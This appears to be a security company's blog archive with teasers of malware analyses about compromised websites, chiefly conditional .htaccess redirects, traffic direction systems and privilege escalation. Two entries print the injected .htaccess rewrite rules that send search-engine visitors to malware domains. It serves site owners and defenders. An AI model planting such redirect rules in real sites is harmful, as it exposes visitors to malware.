.htaccess Tricks in Global.asa Files


As you might know a lot of hacks use Apache configuration .htaccess files to override default web site behavior: add conditional redirects, create virtual paths (e.g mod_rewrite), auto-append code to PHP scripts, etc.

In the world of IIS/ASP there is also an equivalent — Global.asa files. This file contains common declarations for all ASP scripts and should be placed in an ASP application root directory. If this file exists, ASP sessions include this file automatically.

Read More

Hacked Websites Redirect to Bitcoin


Recently, we began to notice that some hacked websites were redirecting traffic from certain browsers to the BitCoin site, bitcoin.org. What’s going on? Is Bitcoin using black hat SEO? Is their site malicious?

Redirect to bitcoin.org

Redirect chain to bitcoin.org in Unmask Parasites results

As you can see, the hacked website doesn’t redirect to bitcoin.org directly. It first redirects to 194 .6 .233 .7/mxjbb . cgi?default, which acts a at raffic directing system (TDS). This piece analyzes request parameters specific to the visitor (IP, browser, referrer, etc.) and makes a decision as to what to do with the particular request. The TDS may have different routes for users from different countries or users with different browsers. Furthermore, the TDS may be completely uninterested in certain requests (e.g. requests from search engine and security bots, or requests from browsers that can be very hard to exploit). A typical TDS would either return some HTTP error (e.g. 404 Page Not Found) or redirect unwanted traffic to some neutral third-party site. Most TDS are configured to dump unwanted traffic to google.com.
Read More

Website Malware – Curious .htaccess Conditional Redirect Case

I really enjoy when I see different types of conditional redirects on compromised sites. They are really hard to detect and always lead to interesting investigations. Take a look at this last one we identified:

Website Malware - Curious HTACCESS Payload

The curious aspect about it is the use of a not-so-common .htaccess feature: variables. Most conditional injections rely only on the user agent (browser) or referrer of the visitor, but this one also leveraged the TIME_SEC and VWM variables:

RewriteRule .* - [E=cNL:%{TIME_SEC}]
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]

Read More

From a Site Compromise to Full Root Access – Symlinks to Root – Part I

When an attacker manages to compromise and get access to a website, they won’t likely stop there, they will aim to gain full root (admin) access to the entire server. If there are more websites hosted on the server being attacked, It is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access, to full root level access on a server.

Read More

SiteCheck – Got Blackhat SEO Spam Warning?

As of late it seems like we’re talking about a lot of SPAM related cases, this post will be no different.

Blackhat SEO

Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google It) infection there is. They constantly evolve, making them difficult to detect and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.

Read More

Redirection Malware Very Good Leads to Fake AV

If you look at our Labs malware dump for the last few days, you will find something odd in the name of the top domains distributing malware:

712 redirections http://moi-verygoods.ru/simmetry?6
154 redirections http://moiverygoods.ru/simmetry?6
135 redirections http://webverygoods.ru/simmetry?6
131 redirections http://moiverygoods.ru/simmetry?6
88 redirections http://24-verygoods.ru/in.cgi?9

Read More

Sucuri SiteCheck – Web Malware Distribution – May 2012

Last month ( May 2012), we were able to identify 94,866 compromised (hacked) websites using our free SiteCheck scanner.

These were the top infections per distribution type (iframes and conditional redirections). A comparison to April can be seen here – Sucuri SiteCheck – Web Malware Distribution – April 2012):

You can more closely follow the daily activity in our labs by following Sucuri Labs and monitoring the Sucuri Labs page.

Conditional (often htaccess) redirections:

Read More

Malware Redirecting To Enormousw1illa.com

We are seeing a large number of sites compromised with a conditional redirection to the domain http://enormousw1illa.com/ (

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (http://enormousw1illa.com/nl-in.php?nnn=556).

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]

Google is already blacklisting it and so far it found that it was used to compromise 787 domains (but the number is probably bigger, since that domain just went live 3 days ago – Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including mieszkanielondyn.com/, thecentsiblelife.com/, red66.com/.

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:

.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.

If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net

The New (and Old) .htaccess Attacks – Now Using .in Domains

We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.

For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:


Read More

Htaccess Redirection to Sweepstakesandcontestsinfo dot com

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]

Read More